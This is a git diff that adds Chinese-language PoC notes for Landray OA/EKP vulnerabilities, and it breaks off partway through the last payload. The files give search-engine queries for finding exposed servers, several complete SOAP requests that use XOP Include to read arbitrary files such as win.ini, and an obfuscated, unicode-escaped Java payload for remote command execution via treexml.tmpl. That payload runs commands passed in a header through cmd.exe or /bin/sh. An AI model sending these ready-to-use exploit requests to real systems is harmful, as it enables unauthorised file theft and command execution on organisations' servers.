+    <web:getLoginSessionId>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getLoginSessionId>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc6
+
+```javascript
+POST /sys/webservice/wechatWebserviceService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.wechat.third.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getAttachement>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getAttachement>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc7
+
+```javascript
+POST /sys/webservice/sysNotifyTodoWebServiceEkpj HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://ekpj.webservice.notify.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getAllTodoId>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getAllTodoId>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc8
+
+```javascript
+POST /sys/webservice/sysSynchroGetOrgWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://out.webservice.organization.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getOrgStaffingLevelInfo>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getOrgStaffingLevelInfo>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+![image-20241218111203883](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181112007.png)
\ No newline at end of file
diff --git a/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md b/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md
new file mode 100644
index 0000000..e05c71a
--- /dev/null
+++ b/蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞.md
@@ -0,0 +1,40 @@
+# 蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞
+
+蓝凌EKP系统接口sysFormMainDataInsystemWebservice存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+body="Com_Parameter"
+```
+
+## poc
+
+```javascript
+POST /sys/webservice/sysFormMainDataInsystemWebservice HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.maindata.xform.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getData>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getData>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+![image-20241218110643116](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181106199.png)
+
diff --git a/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md b/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md
new file mode 100644
index 0000000..714b82b
--- /dev/null
+++ b/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md
@@ -0,0 +1,47 @@
+# 蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞
+
+蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+body="Com_Parameter"
+```
+
+## poc
+
+```javascript
+POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Connection: close
+Content-Length: 563
+Content-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5q
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------oxmmdmlnvlx08yluof5q
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+<web:getTodo>
+<arg0>
+<otherCond>1</otherCond>
+<pageNo>1</pageNo>
+<rowSize>1</rowSize>
+<targets>1</targets>
+<type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///c:windows/win.ini"/></type>
+</arg0>
+</web:getTodo>
+</soapenv:Body>
+</soapenv:Envelope>
+------oxmmdmlnvlx08yluof5q--
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412181052623.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/9xcoXmoJb8GJnID4D2Wa-g
\ No newline at end of file
diff --git a/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md b/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md
new file mode 100644
index 0000000..4e6c11f
--- /dev/null
+++ b/蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞.md
@@ -0,0 +1,45 @@
+# 蓝凌OA-EKP系统接口hrStaffWebService存在任意文件读取漏洞
+蓝凌核心产品EKP平台定位为新一代数字化生态OA平台，数字化向纵深发展，正加速构建产业互联网，对企业协作能力提出更高要求，蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化，赋能大中型组织更高效的内外协作与管理，支撑商业模式创新与转型发展。深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。
+
+# hunter
+```javascript
+app.name="Landray 蓝凌OA"
+```
+
+![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1699624430077-2cffea44-6670-4ae3-81c6-97bae85b26fd.png)
+
+## poc
+```java
+POST /sys/webservice/hrStaffWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
+Content-Length: 563
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US;q=0.9,en;q=0.8
+Cache-Control: max-age=0
+Connection: close
+Content-Type: multipart/related; boundary=----frhpvivnctknnkiwugaq
+SOAPAction: ""
+
+------frhpvivnctknnkiwugaq
+Content-Disposition: form-data; name="1"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getHrStaffElements>
+        <arg0>
+            <beginTimeStamp>1</beginTimeStamp>
+            <count><xop:Include 
+xmlns:xop="http://www.w3.org/2004/08/xop/include" 
+href="file:///"/></count>
+        </arg0>
+    </web:getHrStaffElements>
+</soapenv:Body>
+</soapenv:Envelope>
+------frhpvivnctknnkiwugaq--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1730429801848-e18487e1-ff5e-479a-af65-8a405e0f6c6b.png)
+
diff --git a/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md b/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md
new file mode 100644
index 0000000..08820ce
--- /dev/null
+++ b/蓝凌OA-treexml.tmpl-远程命令执行漏洞.md
@@ -0,0 +1,25 @@
+## 蓝凌OA treexml.tmpl 远程命令执行漏洞
+
+## fofa
+```
+app="Landray-OA系统"
+```
+
+## exp
+```
+POST /data/sys-common/treexml.tmpl HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+RunGo: dir
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Content-Length: 0
+
+s_bean=ruleFormulaValidate&script=\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0052\u0075\u006e\u0047\u006f\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u0